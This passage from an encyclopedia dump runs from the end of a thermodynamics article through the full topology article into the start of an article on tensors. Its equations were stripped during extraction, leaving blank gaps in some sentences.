quantum-mechanical states. This field relates the microscopic properties of individual atoms and molecules to the macroscopic, bulk properties of materials that can be observed on the human scale, thereby explaining classical thermodynamics as a natural result of statistics, classical mechanics, and quantum theory at the microscopic level. Chemical thermodynamics Chemical thermodynamics is the study of the interrelation of energy with chemical reactions or with a physical change of state within the confines of the laws of thermodynamics. The primary objective of chemical thermodynamics is determining the spontaneity of a given transformation. Equilibrium thermodynamics Equilibrium thermodynamics is the study of transfers of matter and energy in systems or bodies that, by agencies in their surroundings, can be driven from one state of thermodynamic equilibrium to another. The term 'thermodynamic equilibrium' indicates a state of balance, in which all macroscopic flows are zero; in the case of the simplest systems or bodies, their intensive properties are homogeneous, and their pressures are perpendicular to their boundaries. In an equilibrium state there are no unbalanced potentials, or driving forces, between macroscopically distinct parts of the system. A central aim in equilibrium thermodynamics is: given a system in a well-defined initial equilibrium state, and given its surroundings, and given its constitutive walls, to calculate what will be the final equilibrium state of the system after a specified thermodynamic operation has changed its walls or surroundings. Non-equilibrium thermodynamics Non-equilibrium thermodynamics is a branch of thermodynamics that deals with systems that are not in thermodynamic equilibrium. Most systems found in nature are not in thermodynamic equilibrium because they are not in stationary states, and are continuously and discontinuously subject to flux of matter and energy to and from other systems. The thermodynamic study of non-equilibrium systems requires more general concepts than are dealt with by equilibrium thermodynamics. Many natural systems still today remain beyond the scope of currently known macroscopic thermodynamic methods. Laws of thermodynamics Thermodynamics is principally based on a set of four laws which are universally valid when applied to systems that fall within the constraints implied by each. In the various theoretical descriptions of thermodynamics these laws may be expressed in seemingly differing forms, but the most prominent formulations are the following. Zeroth law The zeroth law of thermodynamics states: If two systems are each in thermal equilibrium with a third, they are also in thermal equilibrium with each other. This statement implies that thermal equilibrium is an equivalence relation on the set of thermodynamic systems under consideration. Systems are said to be in equilibrium if the small, random exchanges between them (e.g. Brownian motion) do not lead to a net change in energy. This law is tacitly assumed in every measurement of temperature. Thus, if one seeks to decide whether two bodies are at the same temperature, it is not necessary to bring them into contact and measure any changes of their observable properties in time. The law provides an empirical definition of temperature, and justification for the construction of practical thermometers. The zeroth law was not initially recognized as a separate law of thermodynamics, as its basis in thermodynamical equilibrium was implied in the other laws. The first, second, and third laws had been explicitly stated already, and found common acceptance in the physics community before the importance of the zeroth law for the definition of temperature was realized. As it was impractical to renumber the other laws, it was named the zeroth law. First law The first law of thermodynamics states: In a process without transfer of matter, the change in internal energy, , of a thermodynamic system is equal to the energy gained as heat, , less the thermodynamic work, , done by the system on its surroundings. . where denotes the change in the internal energy of a closed system (for which heat or work through the system boundary are possible, but matter transfer is not possible), denotes the quantity of energy supplied to the system as heat, and denotes the amount of thermodynamic work done by the system on its surroundings. An equivalent statement is that perpetual motion machines of the first kind are impossible; work done by a system on its surrounding requires that the system's internal energy decrease or be consumed, so that the amount of internal energy lost by that work must be resupplied as heat by an external energy source or as work by an external machine acting on the system (so that is recovered) to make the system work continuously. For processes that include transfer of matter, a further statement is needed: With due account of the respective fiducial reference states of the systems, when two systems, which may be of different chemical compositions, initially separated only by an impermeable wall, and otherwise isolated, are combined into a new system by the thermodynamic operation of removal of the wall, then , where denotes the internal energy of the combined system, and and denote the internal energies of the respective separated systems. Adapted for thermodynamics, this law is an expression of the principle of conservation of energy, which states that energy can be transformed (changed from one form to another), but cannot be created or destroyed. Internal energy is a principal property of the thermodynamic state, while heat and work are modes of energy transfer by which a process may change this state. A change of internal energy of a system may be achieved by any combination of heat added or removed and work performed on or by the system. As a function of state, the internal energy does not depend on the manner, or on the path through intermediate steps, by which the system arrived at its state. Second law A traditional version of the second law of thermodynamics states: Heat does not spontaneously flow from a colder body to a hotter body. The second law refers to a system of matter and radiation, initially with inhomogeneities in temperature, pressure, chemical potential, and other intensive properties, that are due to internal 'constraints', or impermeable rigid walls, within it, or to externally imposed forces. The law observes that, when the system is isolated from the outside world and from those forces, there is a definite thermodynamic quantity, its entropy, that increases as the constraints are removed, eventually reaching a maximum value at thermodynamic equilibrium, when the inhomogeneities practically vanish. For systems that are initially far from thermodynamic equilibrium, though several have been proposed, there is known no general physical principle that determines the rates of approach to thermodynamic equilibrium, and thermodynamics does not deal with such rates. The many versions of the second law all express the general irreversibility of the transitions involved in systems approaching thermodynamic equilibrium. In macroscopic thermodynamics, the second law is a basic observation applicable to any actual thermodynamic process; in statistical thermodynamics, the second law is postulated to be a consequence of molecular chaos. Third law The third law of thermodynamics states: As the temperature of a system approaches absolute zero, all processes cease and the entropy of the system approaches a minimum value. This law of thermodynamics is a statistical law of nature regarding entropy and the impossibility of reaching absolute zero of temperature. This law provides an absolute reference point for the determination of entropy. The entropy determined relative to this point is the absolute entropy. Alternate definitions include "the entropy of all systems and of all states of a system is smallest at absolute zero," or equivalently "it is impossible to reach the absolute zero of temperature by any finite number of processes". Absolute zero, at which all activity would stop if it were possible to achieve, is −273.15 °C (degrees Celsius), or −459.67 °F (degrees Fahrenheit), or 0 K (kelvin), or 0° R (degrees Rankine). System models An important concept in thermodynamics is the thermodynamic system, which is a precisely defined region of the universe under study. Everything in the universe except the system is called the surroundings. A system is separated from the remainder of the universe by a boundary which may be a physical or notional, but serve to confine the system to a finite volume. Segments of the boundary are often described as walls; they have respective defined 'permeabilities'. Transfers of energy as work, or as heat, or of matter, between the system and the surroundings, take place through the walls, according to their respective permeabilities. Matter or energy that pass across the boundary so as to effect a change in the internal energy of the system need to be accounted for in the energy balance equation. The volume contained by the walls can be the region surrounding a single atom resonating energy, such as Max Planck defined in 1900; it can be a body of steam or air in a steam engine, such as Sadi Carnot defined in 1824. The system could also be just one nuclide (i.e. a system of quarks) as hypothesized in quantum thermodynamics. When a looser viewpoint is adopted, and the requirement of thermodynamic equilibrium is dropped, the system can be the body of a tropical cyclone, such as Kerry Emanuel theorized in 1986 in the field of atmospheric thermodynamics, or the event horizon of a black hole. Boundaries are of four types: fixed, movable, real, and imaginary. For example, in an engine, a fixed boundary means the piston is locked at its position, within which a constant volume process might occur. If the piston is allowed to move that boundary is movable while the cylinder and cylinder head boundaries are fixed. For closed systems, boundaries are real while for open systems boundaries are often imaginary. In the case of a jet engine, a fixed imaginary boundary might be assumed at the intake of the engine, fixed boundaries along the surface of the case and a second fixed imaginary boundary across the exhaust nozzle. Generally, thermodynamics distinguishes three classes of systems, defined in terms of what is allowed to cross their boundaries: As time passes in an isolated system, internal differences of pressures, densities, and temperatures tend to even out. A system in which all equalizing processes have gone to completion is said to be in a state of thermodynamic equilibrium. Once in thermodynamic equilibrium, a system's properties are, by definition, unchanging in time. Systems in equilibrium are much simpler and easier to understand than are systems which are not in equilibrium. Often, when analysing a dynamic thermodynamic process, the simplifying assumption is made that each intermediate state in the process is at equilibrium, producing thermodynamic processes which develop so slowly as to allow each intermediate step to be an equilibrium state and are said to be reversible processes. States and processes When a system is at equilibrium under a given set of conditions, it is said to be in a definite thermodynamic state. The state of the system can be described by a number of state quantities that do not depend on the process by which the system arrived at its state. They are called intensive variables or extensive variables according to how they change when the size of the system changes. The properties of the system can be described by an equation of state which specifies the relationship between these variables. State may be thought of as the instantaneous quantitative description of a system with a set number of variables held constant. A thermodynamic process may be defined as the energetic evolution of a thermodynamic system proceeding from an initial state to a final state. It can be described by process quantities. Typically, each thermodynamic process is distinguished from other processes in energetic character according to what parameters, such as temperature, pressure, or volume, etc., are held fixed; Furthermore, it is useful to group these processes into pairs, in which each variable held constant is one member of a conjugate pair. Several commonly studied thermodynamic processes are: Adiabatic process: occurs without loss or gain of energy by heat Isenthalpic process: occurs at a constant enthalpy Isentropic process: a reversible adiabatic process, occurs at a constant entropy Isobaric process: occurs at constant pressure Isochoric process: occurs at constant volume (also called isometric/isovolumetric) Isothermal process: occurs at a constant temperature Steady state process: occurs without a change in the internal energy Instrumentation There are two types of thermodynamic instruments, the meter and the reservoir. A thermodynamic meter is any device which measures any parameter of a thermodynamic system. In some cases, the thermodynamic parameter is actually defined in terms of an idealized measuring instrument. For example, the zeroth law states that if two bodies are in thermal equilibrium with a third body, they are also in thermal equilibrium with each other. This principle, as noted by James Maxwell in 1872, asserts that it is possible to measure temperature. An idealized thermometer is a sample of an ideal gas at constant pressure. From the ideal gas law pV=nRT, the volume of such a sample can be used as an indicator of temperature; in this manner it defines temperature. Although pressure is defined mechanically, a pressure-measuring device, called a barometer may also be constructed from a sample of an ideal gas held at a constant temperature. A calorimeter is a device which is used to measure and define the internal energy of a system. A thermodynamic reservoir is a system which is so large that its state parameters are not appreciably altered when it is brought into contact with the system of interest. When the reservoir is brought into contact with the system, the system is brought into equilibrium with the reservoir. For example, a pressure reservoir is a system at a particular pressure, which imposes that pressure upon the system to which it is mechanically connected. The Earth's atmosphere is often used as a pressure reservoir. The ocean can act as temperature reservoir when used to cool power plants. Conjugate variables The central concept of thermodynamics is that of energy, the ability to do work. By the First Law, the total energy of a system and its surroundings is conserved. Energy may be transferred into a system by heating, compression, or addition of matter, and extracted from a system by cooling, expansion, or extraction of matter. In mechanics, for example, energy transfer equals the product of the force applied to a body and the resulting displacement. Conjugate variables are pairs of thermodynamic concepts, with the first being akin to a "force" applied to some thermodynamic system, the second being akin to the resulting "displacement", and the product of the two equaling the amount of energy transferred. The common conjugate variables are: Pressure-volume (the mechanical parameters); Temperature-entropy (thermal parameters); Chemical potential-particle number (material parameters). Potentials Thermodynamic potentials are different quantitative measures of the stored energy in a system. Potentials are used to measure the energy changes in systems as they evolve from an initial state to a final state. The potential used depends on the constraints of the system, such as constant temperature or pressure. For example, the Helmholtz and Gibbs energies are the energies available in a system to do useful work when the temperature and volume or the pressure and temperature are fixed, respectively. Thermodynamic potentials cannot be measured in laboratories, but can be computed using molecular thermodynamics. The five most well known potentials are: where is the temperature, the entropy, the pressure, the volume, the chemical potential, the number of particles in the system, and is the count of particles types in the system. Thermodynamic potentials can be derived from the energy balance equation applied to a thermodynamic system. Other thermodynamic potentials can also be obtained through Legendre transformation. Axiomatic thermodynamics Axiomatic thermodynamics is a mathematical discipline that aims to describe thermodynamics in terms of rigorous axioms, for example by finding a mathematically rigorous way to express the familiar laws of thermodynamics. The first attempt at an axiomatic theory of thermodynamics was Constantin Carathéodory's 1909 work Investigations on the Foundations of Thermodynamics, which made use of Pfaffian systems and the concept of adiabatic accessibility, a notion that was introduced by Carathéodory himself. In this formulation, thermodynamic concepts such as heat, entropy, and temperature are derived from quantities that are more directly measurable. Theories that came after, differed in the sense that they made assumptions regarding thermodynamic processes with arbitrary initial and final states, as opposed to considering only neighboring states. Applied fields
Physical sciences
Physics
null
29954
https://en.wikipedia.org/wiki/Topology
Topology
Topology (from the Greek words , and ) is the branch of mathematics concerned with the properties of a geometric object that are preserved under continuous deformations, such as stretching, twisting, crumpling, and bending; that is, without closing holes, opening holes, tearing, gluing, or passing through itself. A topological space is a set endowed with a structure, called a topology, which allows defining continuous deformation of subspaces, and, more generally, all kinds of continuity. Euclidean spaces, and, more generally, metric spaces are examples of topological spaces, as any distance or metric defines a topology. The deformations that are considered in topology are homeomorphisms and homotopies. A property that is invariant under such deformations is a topological property. The following are basic examples of topological properties: the dimension, which allows distinguishing between a line and a surface; compactness, which allows distinguishing between a line and a circle; connectedness, which allows distinguishing a circle from two non-intersecting circles. The ideas underlying topology go back to Gottfried Wilhelm Leibniz, who in the 17th century envisioned the and . Leonhard Euler's Seven Bridges of Königsberg problem and polyhedron formula are arguably the field's first theorems. The term topology was introduced by Johann Benedict Listing in the 19th century, although, it was not until the first decades of the 20th century that the idea of a topological space was developed. Motivation The motivating insight behind topology is that some geometric problems depend not on the exact shape of the objects involved, but rather on the way they are put together. For example, the square and the circle have many properties in common: they are both one dimensional objects (from a topological point of view) and both separate the plane into two parts, the part inside and the part outside. In one of the first papers in topology, Leonhard Euler demonstrated that it was impossible to find a route through the town of Königsberg (now Kaliningrad) that would cross each of its seven bridges exactly once. This result did not depend on the lengths of the bridges or on their distance from one another, but only on connectivity properties: which bridges connect to which islands or riverbanks. This Seven Bridges of Königsberg problem led to the branch of mathematics known as graph theory. Similarly, the hairy ball theorem of algebraic topology says that "one cannot comb the hair flat on a hairy ball without creating a cowlick." This fact is immediately convincing to most people, even though they might not recognize the more formal statement of the theorem, that there is no nonvanishing continuous tangent vector field on the sphere. As with the Bridges of Königsberg, the result does not depend on the shape of the sphere; it applies to any kind of smooth blob, as long as it has no holes. To deal with these problems that do not rely on the exact shape of the objects, one must be clear about just what properties these problems do rely on. From this need arises the notion of homeomorphism. The impossibility of crossing each bridge just once applies to any arrangement of bridges homeomorphic to those in Königsberg, and the hairy ball theorem applies to any space homeomorphic to a sphere. Intuitively, two spaces are homeomorphic if one can be deformed into the other without cutting or gluing. A famous example, known as the "Topologist's Breakfast", is that a topologist cannot distinguish a coffee mug from a doughnut; a sufficiently pliable doughnut could be reshaped to a coffee cup by creating a dimple and progressively enlarging it, while shrinking the hole into a handle. Homeomorphism can be considered the most basic topological equivalence. Another is homotopy equivalence. This is harder to describe without getting technical, but the essential notion is that two objects are homotopy equivalent if they both result from "squishing" some larger object. History Topology, as a well-defined mathematical discipline, originates in the early part of the twentieth century, but some isolated results can be traced back several centuries. Among these are certain questions in geometry investigated by Leonhard Euler. His 1736 paper on the Seven Bridges of Königsberg is regarded as one of the first practical applications of topology. On 14 November 1750, Euler wrote to a friend that he had realized the importance of the edges of a polyhedron. This led to his polyhedron formula, (where , , and respectively indicate the number of vertices, edges, and faces of the polyhedron). Some authorities regard this analysis as the first theorem, signaling the birth of topology. Further contributions were made by Augustin-Louis Cauchy, Ludwig Schläfli, Johann Benedict Listing, Bernhard Riemann and Enrico Betti. Listing introduced the term "Topologie" in Vorstudien zur Topologie, written in his native German, in 1847, having used the word for ten years in correspondence before its first appearance in print. The English form "topology" was used in 1883 in Listing's obituary in the journal Nature to distinguish "qualitative geometry from the ordinary geometry in which quantitative relations chiefly are treated". Their work was corrected, consolidated and greatly extended by Henri Poincaré. In 1895, he published his ground-breaking paper on Analysis Situs, which introduced the concepts now known as homotopy and homology, which are now considered part of algebraic topology. Unifying the work on function spaces of Georg Cantor, Vito Volterra, Cesare Arzelà, Jacques Hadamard, Giulio Ascoli and others, Maurice Fréchet introduced the metric space in 1906. A metric space is now considered a special case of a general topological space, with any given topological space potentially giving rise to many distinct metric spaces. In 1914, Felix Hausdorff coined the term "topological space" and gave the definition for what is now called a Hausdorff space. Currently, a topological space is a slight generalization of Hausdorff spaces, given in 1922 by Kazimierz Kuratowski. Modern topology depends strongly on the ideas of set theory, developed by Georg Cantor in the later part of the 19th century. In addition to establishing the basic ideas of set theory, Cantor considered point sets in Euclidean space as part of his study of Fourier series. For further developments, see point-set topology and algebraic topology. The 2022 Abel Prize was awarded to Dennis Sullivan "for his groundbreaking contributions to topology in its broadest sense, and in particular its algebraic, geometric and dynamical aspects". Concepts Topologies on sets The term topology also refers to a specific mathematical idea central to the area of mathematics called topology. Informally, a topology describes how elements of a set relate spatially to each other. The same set can have different topologies. For instance, the real line, the complex plane, and the Cantor set can be thought of as the same set with different topologies. Formally, let be a set and let be a family of subsets of . Then is called a topology on if: Both the empty set and are elements of . Any union of elements of is an element of . Any intersection of finitely many elements of is an element of . If is a topology on , then the pair is called a topological space. The notation may be used to denote a set endowed with the particular topology . By definition, every topology is a -system. The members of are called open sets in . A subset of is said to be closed if its complement is in (that is, its complement is open). A subset of may be open, closed, both (a clopen set), or neither. The empty set and itself are always both closed and open. An open subset of which contains a point is called an open neighborhood of . Continuous functions and homeomorphisms A function or map from one topological space to another is called continuous if the inverse image of any open set is open. If the function maps the real numbers to the real numbers (both spaces with the standard topology), then this definition of continuous is equivalent to the definition of continuous in calculus. If a continuous function is one-to-one and onto, and if the inverse of the function is also continuous, then the function is called a homeomorphism and the domain of the function is said to be homeomorphic to the range. Another way of saying this is that the function has a natural extension to the topology. If two spaces are homeomorphic, they have identical topological properties, and are considered topologically the same. The cube and the sphere are homeomorphic, as are the coffee cup and the doughnut. However, the sphere is not homeomorphic to the doughnut. Manifolds While topological spaces can be extremely varied and exotic, many areas of topology focus on the more familiar class of spaces known as manifolds. A manifold is a topological space that resembles Euclidean space near each point. More precisely, each point of an -dimensional manifold has a neighborhood that is homeomorphic to the Euclidean space of dimension . Lines and circles, but not figure eights, are one-dimensional manifolds. Two-dimensional manifolds are also called surfaces, although not all surfaces are manifolds. Examples include the plane, the sphere, and the torus, which can all be realized without self-intersection in three dimensions, and the Klein bottle and real projective plane, which cannot (that is, all their realizations are surfaces that are not manifolds). Topics General topology General topology is the branch of topology dealing with the basic set-theoretic definitions and constructions used in topology. It is the foundation of most other branches of topology, including differential topology, geometric topology, and algebraic topology. Another name for general topology is point-set topology. The basic object of study is topological spaces, which are sets equipped with a topology, that is, a family of subsets, called open sets, which is closed under finite intersections and (finite or infinite) unions. The fundamental concepts of topology, such as continuity, compactness, and connectedness, can be defined in terms of open sets. Intuitively, continuous functions take nearby points to nearby points. Compact sets are those that can be covered by finitely many sets of arbitrarily small size. Connected sets are sets that cannot be divided into two pieces that are far apart. The words nearby, arbitrarily small, and far apart can all be made precise by using open sets. Several topologies can be defined on a given space. Changing a topology consists of changing the collection of open sets. This changes which functions are continuous and which subsets are compact or connected. Metric spaces are an important class of topological spaces where the distance between any two points is defined by a function called a metric. In a metric space, an open set is a union of open disks, where an open disk of radius centered at is the set of all points whose distance to is less than . Many common spaces are topological spaces whose topology can be defined by a metric. This is the case of the real line, the complex plane, real and complex vector spaces and Euclidean spaces. Having a metric simplifies many proofs. Algebraic topology Algebraic topology is a branch of mathematics that uses tools from algebra to study topological spaces. The basic goal is to find algebraic invariants that classify topological spaces up to homeomorphism, though usually most classify up to homotopy equivalence. The most important of these invariants are homotopy groups, homology, and cohomology. Although algebraic topology primarily uses algebra to study topological problems, using topology to solve algebraic problems is sometimes also possible. Algebraic topology, for example, allows for a convenient proof that any subgroup of a free group is again a free group. Differential topology Differential topology is the field dealing with differentiable functions on differentiable manifolds. It is closely related to differential geometry and together they make up the geometric theory of differentiable manifolds. More specifically, differential topology considers the properties and structures that require only a smooth structure on a manifold to be defined. Smooth manifolds are "softer" than manifolds with extra geometric structures, which can act as obstructions to certain types of equivalences and deformations that exist in differential topology. For instance, volume and Riemannian curvature are invariants that can distinguish different geometric structures on the same smooth manifoldthat is, one can smoothly "flatten out" certain manifolds, but it might require distorting the space and affecting the curvature or volume. Geometric topology Geometric topology is a branch of topology that primarily focuses on low-dimensional manifolds (that is, spaces of dimensions 2, 3, and 4) and their interaction with geometry, but it also includes some higher-dimensional topology. Some examples of topics in geometric topology are orientability, handle decompositions, local flatness, crumpling and the planar and higher-dimensional Schönflies theorem. In high-dimensional topology, characteristic classes are a basic invariant, and surgery theory is a key theory. Low-dimensional topology is strongly geometric, as reflected in the uniformization theorem in 2 dimensions – every surface admits a constant curvature metric; geometrically, it has one of 3 possible geometries: positive curvature/spherical, zero curvature/flat, and negative curvature/hyperbolic – and the geometrization conjecture (now theorem) in 3 dimensions – every 3-manifold can be cut into pieces, each of which has one of eight possible geometries. 2-dimensional topology can be studied as complex geometry in one variable (Riemann surfaces are complex curves) – by the uniformization theorem every conformal class of metrics is equivalent to a unique complex one, and 4-dimensional topology can be studied from the point of view of complex geometry in two variables (complex surfaces), though not every 4-manifold admits a complex structure. Generalizations Occasionally, one needs to use the tools of topology but a "set of points" is not available. In pointless topology one considers instead the lattice of open sets as the basic notion of the theory, while Grothendieck topologies are structures defined on arbitrary categories that allow the definition of sheaves on those categories, and with that the definition of general cohomology theories. Applications Biology Topology has been used to study various biological systems including molecules and nanostructure (e.g., membraneous objects). In particular, circuit topology and knot theory have been extensively applied to classify and compare the topology of folded proteins and nucleic acids. Circuit topology classifies folded molecular chains based on the pairwise arrangement of their intra-chain contacts and chain crossings. Knot theory, a branch of topology, is used in biology to study the effects of certain enzymes on DNA. These enzymes cut, twist, and reconnect the DNA, causing knotting with observable effects such as slower electrophoresis. Computer science Topological data analysis uses techniques from algebraic topology to determine the large scale structure of a set (for instance, determining if a cloud of points is spherical or toroidal). The main method used by topological data analysis is to: Replace a set of data points with a family of simplicial complexes, indexed by a proximity parameter. Analyse these topological complexes via algebraic topology – specifically, via the theory of persistent homology. Encode the persistent homology of a data set in the form of a parameterized version of a Betti number, which is called a barcode. Several branches of programming language semantics, such as domain theory, are formalized using topology. In this context, Steve Vickers, building on work by Samson Abramsky and Michael B. Smyth, characterizes topological spaces as Boolean or Heyting algebras over open sets, which are characterized as semidecidable (equivalently, finitely observable) properties. Physics Topology is relevant to physics in areas such as condensed matter physics, quantum field theory and physical cosmology. The topological dependence of mechanical properties in solids is of interest in disciplines of mechanical engineering and materials science. Electrical and mechanical properties depend on the arrangement and network structures of molecules and elementary units in materials. The compressive strength of crumpled topologies is studied in attempts to understand the high strength to weight of such structures that are mostly empty space. Topology is of further significance in Contact mechanics where the dependence of stiffness and friction on the dimensionality of surface structures is the subject of interest with applications in multi-body physics. A topological quantum field theory (or topological field theory or TQFT) is a quantum field theory that computes topological invariants. Although TQFTs were invented by physicists, they are also of mathematical interest, being related to, among other things, knot theory, the theory of four-manifolds in algebraic topology, and to the theory of moduli spaces in algebraic geometry. Donaldson, Jones, Witten, and Kontsevich have all won Fields Medals for work related to topological field theory. The topological classification of Calabi–Yau manifolds has important implications in string theory, as different manifolds can sustain different kinds of strings. In cosmology, topology can be used to describe the overall shape of the universe. This area of research is commonly known as spacetime topology. In condensed matter a relevant application to topological physics comes from the possibility to obtain one-way current, which is a current protected from backscattering. It was first discovered in electronics with the famous quantum Hall effect, and then generalized in other areas of physics, for instance in photonics by F.D.M Haldane. Robotics The possible positions of a robot can be described by a manifold called configuration space. In the area of motion planning, one finds paths between two points in configuration space. These paths represent a motion of the robot's joints and other parts into the desired pose. Games and puzzles Disentanglement puzzles are based on topological aspects of the puzzle's shapes and components. Fiber art In order to create a continuous join of pieces in a modular construction, it is necessary to create an unbroken path in an order which surrounds each piece and traverses each edge only once. This process is an application of the Eulerian path. Resources and research Major journals Geometry & Topology- a mathematic research journal focused on geometry and topology, and their applications, published by Mathematical Sciences Publishers. Journal of Topology- a scientific journal which publishes papers of high quality and significance in topology, geometry, and adjacent areas of mathematics. Major books Munkres, James R. (2000). Topology (2nd ed.). Upper Saddle River, NJ: Prentice Hall. Willard, Stephen (2016). General topology. Dover books on mathematics. Mineola, N.Y: Dover publications. Armstrong, M. A. (1983). Basic topology. Undergraduate texts in mathematics. New York: Springer-Verlag.
Mathematics
Geometry and topology
null
29965
https://en.wikipedia.org/wiki/Tensor
Tensor
In mathematics, a tensor is an algebraic object that describes a multilinear relationship between sets of algebraic objects related to a vector space. Tensors may map between different objects such as vectors, scalars, and even other tensors. There are many types of tensors, including scalars and vectors (which are the simplest tensors), dual vectors, multilinear maps between vector spaces, and even some operations such as the dot product. Tensors are defined independent of any basis, although they are often referred to by their components in a basis related to a particular coordinate system; those components form an array, which can be thought of as a high-dimensional matrix. Tensors have become important in physics because they provide a concise mathematical framework for formulating and solving physics problems in areas such as mechanics (stress, elasticity, quantum mechanics, fluid mechanics, moment of inertia, ...), electrodynamics (electromagnetic tensor, Maxwell tensor, permittivity, magnetic susceptibility, ...), and general relativity (stress–energy tensor, curvature tensor, ...). In applications, it is common to study situations in which a different tensor can occur at each point of an object; for example the stress within an object may vary from one location to another. This leads to the concept of a tensor field. In some areas, tensor fields are so ubiquitous that they are often simply called "tensors". Tullio Levi-Civita and Gregorio Ricci-Curbastro popularised tensors in 1900 – continuing the earlier work of Bernhard Riemann, Elwin Bruno Christoffel, and others – as part of the absolute differential calculus. The concept enabled an alternative formulation of the intrinsic differential geometry of a manifold in the form of the Riemann curvature tensor. Definition Although seemingly different, the various approaches to defining tensors describe the same geometric concept using different language and at different levels of abstraction. As multidimensional arrays A tensor may be represented as a (potentially multidimensional) array. Just as a vector in an -dimensional space is represented by a one-dimensional array with components with respect to a given basis, any tensor with respect to a basis is represented by a multidimensional array. For example, a linear operator is represented in a basis as a two-dimensional square array. The numbers in the multidimensional array are known as the components of the tensor. They are denoted by indices giving their position in the array, as subscripts and superscripts, following the symbolic name of the tensor. For example, the components of an order tensor could be denoted  , where and are indices running from to , or also by . Whether an index is displayed as a superscript or subscript depends on the transformation properties of the tensor, described below. Thus while and can both be expressed as n-by-n matrices, and are numerically related via index juggling, the difference in their transformation laws indicates it would be improper to add them together. The total number of indices () required to identify each component uniquely is equal to the dimension or the number of ways of an array, which is why a tensor is sometimes referred to as an -dimensional array or an -way array. The total number of indices is also called the order, degree or rank of a tensor, although the term "rank" generally has another meaning in the context of matrices and tensors. Just as the components of a vector change when we change the basis of the vector space, the components of a tensor also change under such a transformation. Each type of tensor comes equipped with a transformation law that details how the components of the tensor respond to a change of basis. The components of a vector can respond in two distinct ways to a change of basis (see Covariance and contravariance of vectors), where the new basis vectors are expressed in terms of the old basis vectors as, Here R ji are the entries of the change of basis matrix, and in the rightmost expression the summation sign was suppressed: this is the Einstein summation convention, which will be used throughout this article. The components vi of a column vector v transform with the inverse of the matrix R, where the hat denotes the components in the new basis. This is called a contravariant transformation law, because the vector components transform by the inverse of the change of basis. In contrast, the components, wi, of a covector (or row vector), w, transform with the matrix R itself, This is called a covariant transformation law, because the covector components transform by the same matrix as the change of basis matrix. The components of a more general tensor are transformed by some combination of covariant and contravariant transformations, with one transformation law for each index. If the transformation matrix of an index is the inverse matrix of the basis transformation, then the index is called contravariant and is conventionally denoted with an upper index (superscript). If the transformation matrix of an index is the basis transformation itself, then the index is called covariant and is denoted with a lower index (subscript). As a simple example, the matrix of a linear operator with respect to a basis is a rectangular array that transforms under a change of basis matrix by . For the individual matrix entries, this transformation law has the form so the tensor corresponding to the matrix of a linear operator has one covariant and one contravariant index: it is of type (1,1). Combinations of covariant and contravariant components with the same index allow us to express geometric invariants. For example, the fact that a vector is the same object in different coordinate systems can be captured by the following equations, using the formulas defined above: , where is the Kronecker delta, which functions similarly to the identity matrix, and has the effect of renaming indices (j into k in this example). This shows several features of the component notation: the ability to re-arrange terms at will (commutativity), the need to use different indices when working with multiple objects in the same expression, the ability to rename indices, and the manner in which contravariant and covariant tensors combine so that all instances of the transformation matrix and its inverse cancel, so that expressions like can immediately be seen to be geometrically identical in all coordinate systems. Similarly, a linear operator, viewed as a geometric object, does not actually depend on a basis: it is just a linear map that accepts a vector as an argument and produces another vector. The transformation law for how the matrix of components of a linear operator changes with the basis is consistent with the transformation law for a contravariant vector, so that the action of a linear operator on a contravariant vector is represented in coordinates as the matrix product of their respective coordinate representations. That is, the components are given by . These components transform contravariantly, since The transformation law for an order tensor with p contravariant indices and q covariant indices is thus given as, Here the primed indices denote components in the new coordinates, and the unprimed indices denote the components in the old coordinates. Such a tensor is said to be of order or type . The terms "order", "type", "rank", "valence", and "degree" are all sometimes used for the same concept. Here, the term "order" or "total order" will be used for the total dimension of the array (or its generalization in other definitions), in the preceding example, and the term "type" for the pair giving the number of contravariant and covariant indices. A tensor of type is also called a -tensor for short. This discussion motivates the following formal definition: The definition of a tensor as a multidimensional array satisfying a transformation law traces back to the work of Ricci. An equivalent definition of a tensor uses the representations of the general linear group. There is an action of the general linear group on the set of all ordered bases of an n-dimensional vector space. If is an ordered basis, and is an invertible matrix, then the action is given by Let F be the set of all ordered bases. Then F is a principal homogeneous space for GL(n). Let W be a vector space and let be a representation of GL(n) on W (that is, a group homomorphism ). Then a tensor of type is an equivariant map . Equivariance here means that When is a tensor representation of the general linear group, this gives the usual definition of tensors as multidimensional arrays. This definition is often used to describe tensors on manifolds, and readily generalizes to other groups. As multilinear maps A downside to the definition of a tensor using the multidimensional array approach is that it is not apparent from the definition that the defined object is indeed basis independent, as is expected from an intrinsically geometric object. Although it is possible to show that transformation laws indeed ensure independence from the basis, sometimes a more intrinsic definition is preferred. One approach that is common in differential geometry is to define tensors relative to a fixed (finite-dimensional) vector space V, which is usually taken to be a particular vector space of some geometrical significance like the tangent space to a manifold. In this approach, a type tensor T is defined as a multilinear map, where V∗ is the corresponding dual space of covectors, which is linear in each of its arguments. The above assumes V is a vector space over the real numbers, . More generally, V can be taken over any field F (e.g. the complex numbers), with F replacing as the codomain of the multilinear maps. By applying a multilinear map T of type to a basis {ej} for V and a canonical cobasis {εi} for V∗, a -dimensional array of components can be obtained. A different choice of basis will yield different components. But, because T is linear in all of its arguments, the components satisfy the tensor transformation law used in the multilinear array definition. The multidimensional array of components of T thus form a tensor according to that definition. Moreover, such an array can be realized as the components of some multilinear map T. This motivates viewing multilinear maps as the intrinsic objects underlying tensors. In viewing a tensor as a multilinear map, it is conventional to identify the double dual V∗∗ of the vector space V, i.e., the space of linear functionals on the dual vector space V∗, with the vector space V. There is always a natural linear map from V to its double dual, given by evaluating a linear form in V∗ against a vector in V. This linear mapping is an isomorphism in finite dimensions, and it is often then expedient to identify V with its double dual. Using tensor products For some mathematical applications, a more abstract approach is sometimes useful. This can be achieved by defining tensors in terms of elements of tensor products of vector spaces, which in turn are defined through a universal property as explained here and here. A type tensor is defined in this context as an element of the tensor product of vector spaces, A basis of and basis of naturally induce a basis of the tensor product . The components of a tensor are the coefficients of the tensor with respect to the basis obtained from a basis for and its dual basis , i.e. Using the properties of the tensor product, it can be shown that these components satisfy the transformation law for a type tensor. Moreover, the universal property of the tensor product gives a one-to-one correspondence between tensors defined in this way and tensors defined as multilinear maps. This 1 to 1 correspondence can be achieved in the following way, because in the finite-dimensional case there exists a canonical isomorphism between a vector space and its double dual: The last line is using the universal property of the tensor product, that there is a 1 to 1 correspondence between maps from and . Tensor products can be defined in great generality – for example, involving arbitrary modules over a ring. In principle, one could define a "tensor" simply to be an element of any tensor product. However, the mathematics literature usually reserves the term tensor for an element of a tensor product of any number of copies of a single vector space and its dual, as above. Tensors in infinite dimensions This discussion of tensors so far assumes finite dimensionality of the spaces involved, where the spaces of tensors obtained by each of these constructions are naturally 